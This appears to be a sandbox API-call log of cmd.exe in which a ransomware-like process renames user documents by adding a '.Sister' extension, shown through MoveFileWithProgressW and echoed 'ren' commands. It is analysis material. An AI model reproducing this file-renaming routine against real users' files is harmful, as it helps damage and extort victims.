GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.700] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0305.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.701] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0305.707] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0305.708] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0305.708] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0305.708] malloc (_Size=0xffce) returned 0x21eda2dfc40 [0305.708] ??_V@YAXPEAX@Z () returned 0x21eda2dfc40 [0305.708] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0305.708] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0305.708] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0305.708] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0305.708] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0305.708] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0305.709] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0305.709] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0305.709] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0305.709] ??_V@YAXPEAX@Z () returned 0x1 [0305.709] GetProcessHeap () returned 0x21ed8c70000 [0305.709] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed8d6c150 [0305.709] GetProcessHeap () returned 0x21ed8c70000 [0305.709] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c150, Size=0x74) returned 0x21ed8d67d30 [0305.709] GetProcessHeap () returned 0x21ed8c70000 [0305.709] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67d30) returned 0x74 [0305.709] GetProcessHeap () returned 0x21ed8c70000 [0305.709] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7c) returned 0x21ed93795d0 [0305.709] GetProcessHeap () returned 0x21ed8c70000 [0305.709] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed8d6c5b0 [0305.709] GetProcessHeap () returned 0x21ed8c70000 [0305.709] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c5b0, Size=0x74) returned 0x21ed8d671b0 [0305.710] GetProcessHeap () returned 0x21ed8c70000 [0305.710] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d671b0) returned 0x74 [0305.710] malloc (_Size=0xffce) returned 0x21eda2dfc40 [0305.710] ??_V@YAXPEAX@Z () returned 0x21eda2dfc40 [0305.710] GetProcessHeap () returned 0x21ed8c70000 [0305.710] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc71e0 [0305.710] GetProcessHeap () returned 0x21ed8c70000 [0305.710] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9372e30 [0305.710] _wcsicmp (_String1="r49w_wkpLclkM.docx", _String2=".") returned 68 [0305.710] _wcsicmp (_String1="r49w_wkpLclkM.docx", _String2="..") returned 68 [0305.710] GetFileAttributesW (lpFileName="r49w_wkpLclkM.docx" (normalized: "c:\\users\\fd1hvy\\documents\\r49w_wkplclkm.docx")) returned 0x20 [0305.711] GetProcessHeap () returned 0x21ed8c70000 [0305.711] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93f6b70 [0305.712] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93f6b80 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.712] SetErrorMode (uMode=0x0) returned 0x0 [0305.713] SetErrorMode (uMode=0x1) returned 0x0 [0305.713] GetFullPathNameW (in: lpFileName="r49w_wkpLclkM.docx", nBufferLength=0x7fe7, lpBuffer=0x21eda2dfc40, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\r49w_wkpLclkM.docx", lpFilePart=0xa6cf4fd660*="r49w_wkpLclkM.docx") returned 0x2c [0305.713] SetErrorMode (uMode=0x0) returned 0x1 [0305.713] GetProcessHeap () returned 0x21ed8c70000 [0305.713] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9371f90 [0305.713] _wcsicmp (_String1="r49w_wkpLclkM.docx", _String2=".") returned 68 [0305.713] _wcsicmp (_String1="r49w_wkpLclkM.docx", _String2="..") returned 68 [0305.713] GetFileAttributesW (lpFileName="r49w_wkpLclkM.docx" (normalized: "c:\\users\\fd1hvy\\documents\\r49w_wkplclkm.docx")) returned 0x20 [0305.713] ??_V@YAXPEAX@Z () returned 0x1 [0305.713] malloc (_Size=0xffce) returned 0x21eda2dfc40 [0305.713] ??_V@YAXPEAX@Z () returned 0x21eda2dfc40 [0305.713] malloc (_Size=0xffce) returned 0x21eda2efc20 [0305.713] ??_V@YAXPEAX@Z () returned 0x21eda2efc20 [0305.714] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\r49w_wkpLclkM.docx" (normalized: "c:\\users\\fd1hvy\\documents\\r49w_wkplclkm.docx")) returned 0x20 [0305.714] malloc (_Size=0xffce) returned 0x21ed993f900 [0305.714] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0305.714] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\r49w_wkpLclkM.docx", fInfoLevelId=0x1, lpFindFileData=0x21ed9372e40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9372e40) returned 0x21ed8cc7240 [0305.715] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0305.715] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0305.715] ??_V@YAXPEAX@Z () returned 0x1 [0305.715] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\r49w_wkpLclkM.docx" (normalized: "c:\\users\\fd1hvy\\documents\\r49w_wkplclkm.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\r49w_wkpLclkM.docx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\r49w_wkplclkm.docx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0305.716] FindNextFileW (in: hFindFile=0x21ed8cc7240, lpFindFileData=0x21ed9372e40 | out: lpFindFileData=0x21ed9372e40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ad43f0, ftCreationTime.dwHighDateTime=0x1d59230, ftLastAccessTime.dwLowDateTime=0xb0468040, ftLastAccessTime.dwHighDateTime=0x1d57de9, ftLastWriteTime.dwLowDateTime=0xb0468040, ftLastWriteTime.dwHighDateTime=0x1d57de9, nFileSizeHigh=0x0, nFileSizeLow=0xbc5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="r49w_wkpLclkM.docx", cAlternateFileName="")) returned 0 [0305.717] GetLastError () returned 0x12 [0305.717] FindClose (in: hFindFile=0x21ed8cc7240 | out: hFindFile=0x21ed8cc7240) returned 1 [0305.717] ??_V@YAXPEAX@Z () returned 0x1 [0305.717] ??_V@YAXPEAX@Z () returned 0x1 [0305.717] ??_V@YAXPEAX@Z () returned 0x1 [0305.717] ??_V@YAXPEAX@Z () returned 0x1 [0305.717] GetProcessHeap () returned 0x21ed8c70000 [0305.718] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7240 [0305.718] GetProcessHeap () returned 0x21ed8c70000 [0305.718] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c958c0, Size=0x16) returned 0x21ed8c95940 [0305.718] GetProcessHeap () returned 0x21ed8c70000 [0305.718] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95940) returned 0x16 [0305.718] GetProcessHeap () returned 0x21ed8c70000 [0305.718] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e90, Size=0x20) returned 0x21ed8d45b30 [0305.718] GetProcessHeap () returned 0x21ed8c70000 [0305.718] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45b30) returned 0x20 [0305.718] GetProcessHeap () returned 0x21ed8c70000 [0305.718] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d60f80 [0305.718] GetProcessHeap () returned 0x21ed8c70000 [0305.718] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d60f80, Size=0xb2) returned 0x21ed9374eb0 [0305.718] GetProcessHeap () returned 0x21ed8c70000 [0305.718] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9374eb0) returned 0xb2 [0305.718] GetProcessHeap () returned 0x21ed8c70000 [0305.718] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d35af0 [0305.718] GetProcessHeap () returned 0x21ed8c70000 [0305.718] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d35af0, Size=0x30) returned 0x21ed8d35af0 [0305.718] GetProcessHeap () returned 0x21ed8c70000 [0305.718] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d35af0) returned 0x30 [0305.718] GetProcessHeap () returned 0x21ed8c70000 [0305.719] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d35b30 [0305.719] malloc (_Size=0x1ff9c) returned 0x21eda2dfc40 [0305.719] GetProcessHeap () returned 0x21ed8c70000 [0305.719] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93766b0 [0305.719] GetProcessHeap () returned 0x21ed8c70000 [0305.719] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed9375870 [0305.719] ??_V@YAXPEAX@Z () returned 0x1 [0305.719] malloc (_Size=0x1ff9c) returned 0x21eda2dfc40 [0305.719] GetProcessHeap () returned 0x21ed8c70000 [0305.720] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9375b70 [0305.720] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda2dfc40, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0305.720] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc72a0 [0305.720] FindClose (in: hFindFile=0x21ed8cc72a0 | out: hFindFile=0x21ed8cc72a0) returned 1 [0305.720] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc72a0 [0305.720] FindClose (in: hFindFile=0x21ed8cc72a0 | out: hFindFile=0x21ed8cc72a0) returned 1 [0305.720] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc72a0 [0305.721] FindClose (in: hFindFile=0x21ed8cc72a0 | out: hFindFile=0x21ed8cc72a0) returned 1 [0305.721] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0305.721] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.721] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0305.721] GetProcessHeap () returned 0x21ed8c70000 [0305.721] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67db0 [0305.721] ??_V@YAXPEAX@Z () returned 0x1 [0305.721] ??_V@YAXPEAX@Z () returned 0x1 [0305.721] GetProcessHeap () returned 0x21ed8c70000 [0305.721] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d35b30, Size=0x490) returned 0x21ed8d35b30 [0305.721] GetProcessHeap () returned 0x21ed8c70000 [0305.721] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d35b30) returned 0x490 [0305.721] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0305.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.721] GetFileType (hFile=0x50) returned 0x2 [0305.722] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.722] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0305.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.723] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0305.730] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.730] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0305.730] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0305.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.730] GetFileType (hFile=0x50) returned 0x2 [0305.730] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.730] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0305.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.731] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0305.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.731] GetFileType (hFile=0x50) returned 0x2 [0305.731] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.731] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0305.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.732] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d35b00*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d35b00*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0305.732] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0305.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.732] GetFileType (hFile=0x50) returned 0x2 [0305.732] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.732] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0305.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.733] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0305.739] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0305.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.739] GetFileType (hFile=0x50) returned 0x2 [0305.739] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.739] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0305.740] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.740] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0305.744] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0305.745] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0305.745] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0305.745] malloc (_Size=0xffce) returned 0x21eda2dfc40 [0305.745] ??_V@YAXPEAX@Z () returned 0x21eda2dfc40 [0305.745] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0305.745] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0305.745] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0305.745] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0305.745] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0305.745] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0305.745] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0305.745] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0305.745] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0305.745] ??_V@YAXPEAX@Z () returned 0x1 [0305.745] GetProcessHeap () returned 0x21ed8c70000 [0305.745] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5eb40 [0305.745] GetProcessHeap () returned 0x21ed8c70000 [0305.745] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5eb40, Size=0x130) returned 0x21ed8d2dbd0 [0305.746] GetProcessHeap () returned 0x21ed8c70000 [0305.746] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2dbd0) returned 0x130 [0305.746] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0305.746] malloc (_Size=0xffce) returned 0x21eda2dfc40 [0305.746] ??_V@YAXPEAX@Z () returned 0x21eda2dfc40 [0305.746] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0305.746] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda2dfc40, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0305.753] ??_V@YAXPEAX@Z () returned 0x1 [0305.753] GetProcessHeap () returned 0x21ed8c70000 [0305.753] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d2df90 [0305.753] GetProcessHeap () returned 0x21ed8c70000 [0305.753] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d600a0 [0305.753] GetProcessHeap () returned 0x21ed8c70000 [0305.753] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d600a0, Size=0x130) returned 0x21ed8d2c7d0 [0305.753] GetProcessHeap () returned 0x21ed8c70000 [0305.753] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2c7d0) returned 0x130 [0305.753] malloc (_Size=0xffce) returned 0x21eda2dfc40 [0305.753] ??_V@YAXPEAX@Z () returned 0x21eda2dfc40 [0305.754] GetProcessHeap () returned 0x21ed8c70000 [0305.754] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc72a0 [0305.754] GetProcessHeap () returned 0x21ed8c70000 [0305.754] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93730a0 [0305.754] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0305.754] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0305.754] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.754] GetLastError () returned 0x2 [0305.754] GetProcessHeap () returned 0x21ed8c70000 [0305.754] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9406b60 [0305.754] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9406b70 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.754] SetErrorMode (uMode=0x0) returned 0x0 [0305.754] SetErrorMode (uMode=0x1) returned 0x0 [0305.755] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda2dfc40, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0305.755] SetErrorMode (uMode=0x0) returned 0x1 [0305.755] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0305.755] GetProcessHeap () returned 0x21ed8c70000 [0305.755] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9373310 [0305.755] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0305.755] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0305.755] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.755] GetLastError () returned 0x2 [0305.755] ??_V@YAXPEAX@Z () returned 0x1 [0305.755] malloc (_Size=0xffce) returned 0x21eda2dfc40 [0305.755] ??_V@YAXPEAX@Z () returned 0x21eda2dfc40 [0305.755] malloc (_Size=0xffce) returned 0x21eda2efc20 [0305.755] ??_V@YAXPEAX@Z () returned 0x21eda2efc20 [0305.755] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.755] GetLastError () returned 0x2 [0305.755] _get_osfhandle (_FileHandle=2) returned 0x54 [0305.755] GetFileType (hFile=0x54) returned 0x2 [0305.755] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0305.755] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0305.757] _get_osfhandle (_FileHandle=2) returned 0x54 [0305.757] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0305.757] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0305.757] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0305.757] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0305.763] longjmp () [0305.763] ??_V@YAXPEAX@Z () returned 0x1 [0305.763] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x999c01c0, ftCreationTime.dwHighDateTime=0x1d5d8c6, ftLastAccessTime.dwLowDateTime=0xb6521120, ftLastAccessTime.dwHighDateTime=0x1d5b368, ftLastWriteTime.dwLowDateTime=0xb6521120, ftLastWriteTime.dwHighDateTime=0x1d5b368, nFileSizeHigh=0x0, nFileSizeLow=0x16f95, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="sNMJVBNQnX-SQV11.pptx", cAlternateFileName="")) returned 1 [0305.764] 